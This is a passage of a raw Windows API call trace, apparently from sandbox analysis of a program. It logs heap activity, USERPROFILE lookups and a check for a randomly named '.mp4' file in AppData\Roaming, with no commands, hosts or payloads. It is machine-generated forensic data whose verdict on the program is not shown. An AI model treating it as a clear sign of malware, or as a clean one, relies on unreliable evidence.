(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0112.941] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5f8a0 [0112.941] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/-M_4r.mp4", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\-M_4r.mp4", lpFilePart=0x8cf650*="-M_4r.mp4") returned 0x29 [0112.941] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f8a0 | out: hHeap=0x2af0000) returned 1 [0112.941] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\-M_4r.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\-m_4r.mp4")) returned 0xffffffff [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0112.942] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0112.942] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0112.942] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0112.942] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0112.942] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0112.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1px3r9YZM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0112.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="px3r9YZM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0112.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x3r9YZM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0112.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3r9YZM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0112.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r9YZM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0112.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9YZM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0112.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0112.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZM.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0112.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0112.943] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0112.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77eb8 [0112.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0112.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1px3r9YZM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0112.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="px3r9YZM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0112.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x3r9YZM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0112.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3r9YZM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0112.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r9YZM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0112.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9YZM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0112.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0112.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZM.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0112.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0112.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0112.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0112.944] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0112.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0112.944] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0112.944] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0112.944] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0112.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0112.945] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0112.946] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0112.946] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0112.946] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0112.946] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0112.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0112.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0112.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0112.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0112.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0112.947] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0112.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0112.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.949] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0112.949] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0112.949] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0112.950] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0112.950] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0112.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0112.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0112.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0112.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0112.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0112.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0112.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722b8 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0112.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0112.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0112.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0112.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0112.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0112.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0112.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0112.953] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0112.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 